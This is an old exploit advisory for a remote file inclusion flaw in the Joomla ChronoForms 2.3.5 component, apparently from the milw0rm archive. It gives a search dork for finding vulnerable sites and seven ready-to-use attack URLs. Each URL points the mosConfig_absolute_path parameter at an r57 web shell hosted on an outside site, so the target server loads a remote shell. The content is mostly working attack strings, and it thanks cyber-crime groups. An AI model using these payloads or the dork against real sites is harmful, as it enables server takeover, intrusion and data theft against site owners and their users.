Joomla! Component ChronoForms 2.3.5 - Remote File Inclusion
Author: Crackers_Child
type: webapps
platform: php
port:
date_added: 2008-01-29
date_updated:
verified: 1
codes: OSVDB-41210;CVE-2008-0567;OSVDB-41209;OSVDB-41208;OSVDB-41207;OSVDB-41206;OSVDB-41205;OSVDB-41204
tags:
aliases:
screenshot_url:
application_url:
+______________________________________________By Crackers_Child___________________________________________+
*
*
* [~] Script.......: CHRONOFORMS version V2.3.5
* [~] Down.........: http://www.joomlaos.de/option,com_remository/Itemid,41/func,startdown/id,2810.html
* [~] Author.......: Crackers_Child | cybermilitan@hotmail.com & localexploit@hotmail.com
* [~] Class........: Remote File Ä°nclude Vulnerability
* [~] Dork.........: inurl:/com_chronocontact
* [~] ForFix.........: For Fix Your Script Download http://www.chronoengine.com/component/option,com_docman/task,cat_view/gid,27/ 2.3.7 Version
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
*
*
*
*
* [~] Exploit Rfi...:http://[Taget]/[Path]//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
*
* /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
* /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
* /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
* /administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
* /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
* /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
+_______________________________________________________________________________________________________________________+
[~] İnfo......: Kac Kere ölDunuz ki " Olum Den Korkmuyorum Ben " Diyebiliyorsunuz . . .
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
*
*
* [~] Special Thanx.......: str0ke, SiberSavascilar.com , (Cyber-Crime) , BiyoFrm.Com
*
+_______________________________________________________________________________________________________________________+
# milw0rm.com [2008-01-30]